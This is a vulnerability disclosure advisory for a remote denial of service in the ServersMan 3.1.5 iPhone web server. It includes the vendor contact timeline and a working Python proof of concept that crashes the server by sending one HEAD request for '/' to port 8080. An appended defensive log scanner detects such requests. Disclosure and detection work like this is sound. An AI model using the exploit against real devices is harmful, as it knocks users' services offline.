ServersMan 3.1.5 Denial Of Service

27 Jan 2010 | Reported by mr_me | Type: packetstorm | Source: packetstormsecurity.com

Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit reporte

Code
`|------------------------------------------------------------------|  
| __ __ |  
| _________ ________ / /___ _____ / /____ ____ _____ ___ |  
| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |  
| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |  
| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |  
| |  
| http://www.corelan.be:8800 |  
| [email protected] |  
| |  
|-------------------------------------------------[ EIP Hunters ]--|  
| |  
| Vulnerability Disclosure Report |  
| |  
|------------------------------------------------------------------|  
  
Advisory : CORELAN-10-005  
Disclosure date : 27th Jan 2010  
  
  
0x00 : Vulnerability information  
--------------------------------  
  
[*] Product : Apple Iphone/Ipod - Serversman HTTP Server  
[*] Version : 3.1.5   
[*] Vendor : ServersMan  
[*] URL : http://serversman.com/index_en.jsp  
[*] Platform : Darwin osx (Iphone) 3G  
[*] Type of vulnerability : Remote DoS  
[*] Risk rating : Low  
[*] Issue fixed in version : <unfixed>  
[*] Vulnerability discovered by : mr_me  
[*] Greetings to : corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team  
  
  
0x01 : Vendor description of software  
-------------------------------------  
From the vendor website:  
  
Share your files with friends via ServerMan. Use your iPhone, iPod Touch or Windows Mobile as a web server. Publish audio, pictures, your current location.  
  
  
0x02 : Vulnerability details  
----------------------------  
The vulnerability can be triggered by sending an HTTP HEAD request for the default web root '/' on the device.  
  
  
  
  
0x03 : Vendor communication  
---------------------------  
[*] January 3, 2010 - Initial contact  
[*] January 4, 2010 - Vendor replied requesting PoC code  
[*] January 4, 2010 - Provided vendor with PoC  
[*] January 11, 2010 - Requested patch date and confirmation of vulnerability  
[*] January 12, 2010 - Received confirmation of vulnerability  
[*] January 24, 2010 - Contacted vendor for patch date  
[*] January 27, 2010 - No response from vendor  
  
0x04 : Exploit/PoC  
------------------  
#!/usr/bin/python  
#  
# Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DoS exploit  
# Found by: Steven Seeley (mr_me) seeleymagic [at] hotmail [dot] com  
# Homepage: http://serversman.com/index_en.jsp  
# Download: From the app store (use your itunes account)  
# Tested on: Iphone 3G - firmware 3.1.2 (Darwin kernel)  
# Greetz to: corelanc0d3r, EdiStrosar, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team  
# Special Greetz to TecR0c!  
  
print "|------------------------------------------------------------------|"  
print "| __ __ |"  
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"  
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"  
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"  
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"  
print "| |"  
print "| http://www.corelan.be:8800 |"  
print "| [email protected] |"  
print "| |"  
print "|-------------------------------------------------[ EIP Hunters ]--|"  
print "[+] Apple Iphone/Ipod - Serversman 3.1.5 HTTP Remote DOS exploit"  
  
import socket  
import sys  
  
def Usage():  
    print ("Usage: ./serversman.py <serv_ip>\n")  
    print ("Example: ./serversman.py 192.168.48.183\n")  
if len(sys.argv) <> 2:  
    Usage()  
    sys.exit(1)  
else:  
    hostname = sys.argv[1]  
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    try:  
        sock.connect((hostname, 8080))  
        print "[+] Connecting to the target.."  
    except:  
        print ("[-] Connection error!")  
        sys.exit(1)  
    print "[+] Sending payload.. muhaha ph33r"  
    sock.send("HEAD / HTTP/1.0\r\n\r\n")  
    r=sock.recv(1024)  
    sock.close()  
    print "[+] HTTP Server is now DoSed!"  
    sys.exit(0);  
`
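
A defender-side check for the request described in section 0x02, as an added example that is not part of the original advisory: it scans a combined request/probe log for `HEAD /` requests and marks the ones whose next liveness probe failed. The log format, the `monitor` probe source and every sample line are constructed assumptions.

```python
import re
from typing import List, NamedTuple, Optional

# Constructed sample: requests seen going to the device on port 8080 (the port
# the PoC connects to), interleaved with results of a periodic liveness probe.
# Hypothetical format, not the output of any real tool.
SAMPLE = """\
2010-01-27T10:00:01 192.168.48.20 REQ GET / HTTP/1.1
2010-01-27T10:00:03 192.168.48.20 REQ HEAD /photos/a.jpg HTTP/1.1
2010-01-27T10:00:05 monitor PROBE up
2010-01-27T10:00:09 192.168.48.77 REQ HEAD / HTTP/1.0
2010-01-27T10:00:15 monitor PROBE down
2010-01-27T10:00:25 monitor PROBE down
"""

REQ = re.compile(r"^(\S+) (\S+) REQ (\S+) (\S+) HTTP/\d\.\d$")
PROBE = re.compile(r"^\S+ \S+ PROBE (up|down)$")

class Hit(NamedTuple):
    time: str
    source: str
    followed_by_outage: bool

def is_trigger(method: str, target: str) -> bool:
    """Request shape named in the advisory: HEAD on the web root '/'."""
    return method == "HEAD" and target == "/"

def find_hits(log: str) -> List[Hit]:
    """Return every HEAD / request, flagged if the next probe reported 'down'."""
    hits: List[Hit] = []
    pending: Optional[int] = None  # index of the latest hit still awaiting a probe
    for raw in log.splitlines():
        line = raw.strip()
        req = REQ.match(line)
        if req:
            time, source, method, target = req.groups()
            if is_trigger(method, target):
                hits.append(Hit(time, source, False))
                pending = len(hits) - 1
            continue
        probe = PROBE.match(line)
        if probe and pending is not None:
            if probe.group(1) == "down":
                hits[pending] = hits[pending]._replace(followed_by_outage=True)
            pending = None  # only the first probe after a hit decides
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```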